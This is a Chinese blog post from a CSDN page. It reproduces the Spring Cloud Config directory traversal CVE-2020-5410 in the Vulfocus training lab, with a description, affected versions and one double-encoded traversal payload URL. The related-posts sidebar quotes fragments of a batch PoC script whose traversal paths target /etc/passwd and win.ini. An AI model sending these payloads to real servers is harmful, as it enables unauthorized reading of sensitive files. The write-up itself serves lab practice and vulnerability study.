Vulfocus-Spring 目录遍历(CVE-2020-5410 )

最新推荐文章于 2024-05-31 15:52:39 发布
最新推荐文章于 2024-05-31 15:52:39 发布
阅读量496 收藏
点赞数
文章标签: spring java spring cloud
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41819939/article/details/126048335
版权

Spring 目录遍历 (CVE-2020-5410 )

一、 漏洞描述
Spring Cloud Config是美国威睿(VMware)公司的一套分布式系统的配置管理解决方案。该产品主要为分布式系统中的外部配置提供服务器和客户端支持。 Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求,这可能导致目录遍历攻击。

8888端口
二、影响版本
Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本
三、漏洞复现
payload:

/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..	%252Ftmp%23foo/development

在这里插入图片描述

似命珍惜、
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sharingIsCaring:TwonkyMedia服务器7.0.11-8.5目录遍历CVE-2018-7171
05-15
(和更多) CVE-2018-7171代表TwonkyMedia Server版本7.0.11-8.5(最新版本)中的目录/文件遍历漏洞。 利用此漏洞,攻击者可以列出独立运行TwonkyMedia Server平台的设备上的所有文件。 此外,攻击者可以利用此漏洞...
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2020-5410: Spring Cloud Config Server 目录遍历漏洞通告
爱国小白帽
06-03 2375
CVE-2020-5410: Spring Cloud Config Server 目录遍历漏洞通告 360-CERT [三六零CERT](javascript:void(0)???? 昨天 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HwKUmigU-1591180764214)(https://mmbiz.qpic.cn/mmbiz_jpg/Ic3Rgfdm96f3TFLd7feDIDR9fSLfwvia5uVr9YcNbGcyssibBJCUGb253Z0D64Xbf
Spring 目录遍历(CVE-2020-5410)
weixin_46801402的博客
11-02 490
Spring 目录遍历(CVE-2020-5410)
解决kali使用docker部署 volfocus靶场,镜像管理一键同步提示”服务器内部错误,请联系管理员“问题。
最新发布
corvus_yun的博客
05-31 450
怀疑docker拉取的vulfocus:latest镜像不是最新的版本。如果提示该镜像正在被某容器使用可以强制删除该容器。到这里就差不多完成了,启动容器即可。拉取成功后可删除原安装的镜像。
vulfocus靶场搭建(实测)
热门推荐
m0_50406447的博客
07-28 3万+
vulfocus的特性 1.启动:一键漏洞环境启动,方便简单。 2.自带 Flag 功能:每次启动 flag 都会自动更新,明确漏洞是否利用成功。 3.带有计分功能也可适用于相关安全人员能力的考核。 4.兼容 Vulhub、Vulapps 中所有漏洞镜像。 一、使用centos7作为靶机环境 1.挂载镜像 mkdir /mnt/cdrom:创建挂载点 mount /dev/cdrom /mnt/cdrom:镜像挂载 注意:这个必须已连接,否则镜像挂载失败 2.配置yum源 (1)进入y
SpringCloud CVE_2019_3799--CVE_2020_5410 批量poc
weixin_45427650的博客
04-17 826
import requests import argparse import re CVE_2019_3799_win = r'/aaa/bbb/master/..%252F..%252F..%252F..%252F..%252F..%252Fwindows/win.ini' CVE_2019_3799_linux = r'/foo/default/master/..%252F..%252F..%252F..%252Fetc%252fpasswd' CVE_2020_5410_linux = r'/..
vulfocus靶场通关(目录遍历)
信安是不可或缺的一部分!
01-31 2178
该框架使用了特定的方式来进行配置,从而使开发人员不再需要定义样板化的配置。但是,删除运行应用程序的用户对运行应用程序不需要的任何目录的读取访问权限可以限制影响。受影响的版本为 8.5.14 之前的版本、8.13.6 之前的 8.6.0 版本以及 8.16.1 之前的 8.14.0 版本。uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议,并支持通过插件来运行各种语言,uWSGI 2.0.17之前的PHP插件,没有正确的处理DOCUMENT_ROOT检测,导致用户可以通过…
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
描述 2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 ... web/javax.servlet.jsp.jstl)。 如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?>...
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
cve-2020-2551_poc.py
03-12
cve-2020-2551_poc.py
vulfocus靶场练兵之靶场安装
weixin_43465303的博客
11-11 440
vulfocus靶场练兵之靶场安装&测试_白帽子技术/思路_i春秋社区-分享你的技术,为安全加点温度.
Spring Cloud Config目录遍历漏洞(CVE-2019-3799)
Li-D的博客
09-16 2407
漏洞描述 Spring Cloud Config目录遍历漏洞的本质是允许应用程序通过spring-cloud-config-server模块获取任意配置文件。攻击者可以构建恶意URL以利用目录遍历漏洞。 漏洞危害 由于spring-cloud-config-server模块未对传入路径进行安全限制,攻击者可以利用多个…%252f进行目录遍历,查看服务器其他路径的敏感文件,造成敏感信息泄露。 漏洞影响版本 Spring Cloud Config 2.1.0 to 2.1.1 Spring Cloud Conf
vulfocus 靶机环境搭建部署
csd_ct的专栏
11-05 1万+
vulfocus 本质上是一个漏洞集成平台,里面集成了大量的CVE漏洞环境,采用的是docker环境部署安装,使用起来方便,可作为一个优秀靶场环境,提升实战能力。可本地部署安装,也可以直接使用线上环境vulfocus (fofa.so)http://vulfocus.fofa.so/#/login?redirect=%2Fdashboard 类似的漏洞集成环境,如vulhub也是一个不错的实验环境,不过vulfocus的漏洞都比较新,但数量少,vulhub收集的漏洞个数较多,但大多...
漏洞靶场搭建-Vulfocus
siu~
01-19 964
Vulfocus 是一个漏洞集成平台,将漏洞环境 docker 镜像,放入即可使用,开箱即用。
【漏洞复现-spring-目录遍历vulfocus/spring-cve_2020_5410
10-15 1328
spring-目录遍历
Spring Cloud Config目录遍历漏洞(CVE-2019-3799)预警
systemino的博客
04-22 2334
近日,Spring官方团队在最新的安全更新中披露了一则Spring Cloud Config目录遍历漏洞(CVE-2019-3799)。漏洞官方定级为 High,属于高危漏洞。该漏洞本质是允许应用程序通过spring-cloud-config-server模块获取任意配置文件,攻击者可以构造恶意URL实现目录遍历漏洞的利用。 Spring产品介绍 Spring是一个Java/Java EE/....
Vulfocus安装过程
tlovejr的博客
03-01 4311
一、Vulfocus背景 漏洞靶场是目前每个安全人员以及想学习信息安全的人必备的东西,但目前商业化产品居多,还有一些类似 dvwa、 sqli-labs 这类的开源项目,但是漏洞环境比较固定,使用完一次后就失去其作用。搭建的成本过高,每次启动的流程会比较繁琐,甚至很多场景是不满足的,之前关于漏洞环境镜像使用多的是 vulhub,但是对于我们个人来说,要去构建一个新的漏洞环境确实麻烦,还有配置什么的,单纯的漏洞环境不一定能满足使用的需求,所以Vulfocus就基于当下的一些靶场项目做出了小小的改进来符合需求
记一次kali搭建vulfocus环境
lza20001103的博客
04-23 5513
记一次kali搭建volfocus环境
mkdocs 1.2.2 内置开发服务器允许目录遍历cve-2021-40978
05-14
mkdocs是一款流行的静态网站生成器,它可以将Markdown格式的文档转换成HTML网页。不幸的是,mkdocs的1.2.2版本存在一个漏洞(CVE-2021-40978),如果使用内置的开发服务器,攻击者可以利用目录遍历漏洞来读取服务器上任何文件。这个漏洞的根本原因在于mkdocs没有正确处理用户提供的HTTP请求参数,导致攻击者可以在请求参数中注入恶意内容。 为了利用这个漏洞,攻击者需要发送一个带有特定参数的HTTP请求。参数中包含了“../”这个字符串,意味着攻击者可以访问服务器上根目录之外的文件。通过不断利用目录遍历漏洞,攻击者可以找到并读取服务器上的敏感文件,例如配置文件、密码文件等。这个漏洞对于那些使用mkdocs作为网站生成器并使用内置开发服务器的用户来说,非常严重,因为攻击者可以轻易地获取到他们的网站源码和其他敏感信息。 为了避免这个漏洞,用户可以升级到mkdocs的最新版本,或者使用其他的静态网站生成器。此外,也可以使用专门的Web服务器来代替mkdocs内置的开发服务器。在配置Web服务器时,用户应该注意避免目录遍历漏洞和其他网络安全问题。通过正确地配置Web服务器,用户可以增强他们网站的安全性,并避免潜在的攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值